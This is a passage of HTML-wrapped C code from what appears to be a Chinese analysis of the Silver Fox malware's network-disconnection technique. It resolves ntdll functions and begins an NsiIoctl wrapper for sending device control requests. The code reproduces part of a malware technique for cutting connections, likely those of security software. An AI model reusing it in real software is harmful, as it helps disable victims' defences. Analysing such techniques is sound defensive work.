Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">pNtDeviceIoControlFile </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">NtDeviceIoControlFile_t</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">GetProcAddress</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">ntdll, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;NtDeviceIoControlFile&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">pNtWaitForSingleObject </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">NtWaitForSingleObject_t</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">GetProcAddress</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">ntdll, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;NtWaitForSingleObject&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">pRtlNtStatusToDosError </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">RtlNtStatusToDosError_t</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">GetProcAddress</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">ntdll, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;RtlNtStatusToDosError&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pNtDeviceIoControlFile </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pNtWaitForSingleObject </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pRtlNtStatusToDosError</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#define NT_SUCCESS</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">Status</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">((</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">NTSTATUS</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">Status</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&gt;=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">ULONG NsiIoctl</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD dwIoControlCode,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">LPVOID lpInBuffer,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD nInBufferSize,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">LPVOID lpOutBuffer,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">LPDWORD lpBytesReturned,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">LPOVERLAPPED lpOverlapped</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">static</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> HANDLE hDevice </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> INVALID_HANDLE_VALUE</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">hDevice </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">==</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> INVALID_HANDLE_VALUE</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span 